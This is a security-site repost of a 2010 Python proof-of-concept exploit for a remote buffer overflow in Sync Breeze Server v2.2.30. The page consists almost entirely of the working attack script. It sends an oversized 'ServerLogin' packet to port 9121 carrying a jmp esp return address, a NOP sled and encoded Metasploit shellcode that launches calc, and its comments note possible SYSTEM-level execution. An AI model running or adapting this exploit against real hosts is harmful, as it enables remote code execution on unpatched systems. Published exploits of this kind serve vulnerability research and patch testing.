首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sync Breeze Server v2.2.30 Remote Buffer Overflow Exploit
来源:http://www.x-sploited.com/ 作者:xsploited 发布时间:2010-10-12  

#!/usr/bin/python

# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely effected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A

### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client.
# If a packet with a length greater than 484 bytes is received with the command prefix "ServerLogin." the effected Service (syncbrs.exe)
# will crash, from the result of a buffer overflow. An attacker can easily leverage this vulnerability and control execution flow /
# execute arbitrary code.
###
# This PoCs Usage:
# 1. Verify that the service is running on the remote machine, the default port is 9121.
# 2. Execute syncbreeze.py against the host
# 3. Check remote machines process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privelage escilation attack vector (although I have not verified this yet)

# I am sure a lot more can be done with this (fit more shellcode, universal etc.) I'll leave that up to researchers however.
# Have fun!
###

### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###

import sys,socket

if len(sys.argv) != 2:
    print "[!] Usage: ./syncbreeze.py <Target IP>"
    sys.exit(1)

about = "=================================================\n"
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC\n"
about +=  "Author: xsploited security\nURL: http://www.x-sploited.com/\n"
about +=  "Contact: xsploitedsecurity [at] gmail.com\n"
about +=  "=================================================\n"
print about

host = sys.argv[1]
port = 9121    #default server port, unchangeable (I think)

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x8c"
"\x8a\x10\x83\xeb\xfc\xe2\xf4\x6b\x64\x03\x10\x97\x8c\xea\x99"
"\x72\xbd\x58\x74\x1c\xde\xba\x9b\xc5\x80\x01\x42\x83\x07\xf8"
"\x38\x98\x3b\xc0\x36\xa6\x73\xbb\xd0\x3b\xb0\xeb\x6c\x95\xa0"
"\xaa\xd1\x58\x81\x8b\xd7\x75\x7c\xd8\x47\x1c\xde\x9a\x9b\xd5"
"\xb0\x8b\xc0\x1c\xcc\xf2\x95\x57\xf8\xc0\x11\x47\xdc\x01\x58"
"\x8f\x07\xd2\x30\x96\x5f\x69\x2c\xde\x07\xbe\x9b\x96\x5a\xbb"
"\xef\xa6\x4c\x26\xd1\x58\x81\x8b\xd7\xaf\x6c\xff\xe4\x94\xf1"
"\x72\x2b\xea\xa8\xff\xf2\xcf\x07\xd2\x34\x96\x5f\xec\x9b\x9b"
"\xc7\x01\x48\x8b\x8d\x59\x9b\x93\x07\x8b\xc0\x1e\xc8\xae\x34"
"\xcc\xd7\xeb\x49\xcd\xdd\x75\xf0\xcf\xd3\xd0\x9b\x85\x67\x0c"
"\x4d\xfd\x8d\x07\x95\x2e\x8c\x8a\x10\xc7\xe4\xbb\x9b\xf8\x0b"
"\x75\xc5\x2c\x72\x84\x22\x7d\xe4\x2c\x85\x2a\x11\x75\xc5\xab"
"\x8a\xf6\x1a\x17\x77\x6a\x65\x92\x37\xcd\x03\xe5\xe3\xe0\x10"
"\xc4\x73\x5f\x73\xf6\xe0\xe9\x10");
 
# Begin payload buffer:

packet_header = ("\x53\x65\x72\x76\x65\x72\x4C\x6F\x67\x69\x6E\x02");

junk = "\x90" * 256;    #265 byte junk buffer to reach eip
eip = "\xFB\xF8\xAB\x71";  #jmp esp (via ws2_32.dll)
nops = "\x90" * 12;    #small nop sled

# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]

packet = packet_header + junk + eip + nops + calc + nops + nops;

print "[*] Connecting to " + host + "...\r"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))

print "[*] Connected, Sending payload\r"
s.send(packet + "\r\n")
print "[*] Payload sent successfully"
print "[*] Check the results\r"
s.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AoA Audio Extractor v2.x Activ
·FoxPlayer 2.3.0 (.m3u) Buffer
·xweblog.2.2 Database Disclosur
·AlZip v7.4 DLL Hijacking Explo
·Beta Asp - Anket Database Disc
·MySQl 5.1 DLL Hijacking Exploi
·Catalog Manager Database Discl
·Apache 2.2.15 DLL Hijacking Ex
·corvus e-kart scripti v0-5 (tr
·My Vacation Tracker DLL Hijack
·erolife e-kart sistemi (tr) Da
·xWeblog v2.2 (arsiv.asp tarih)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved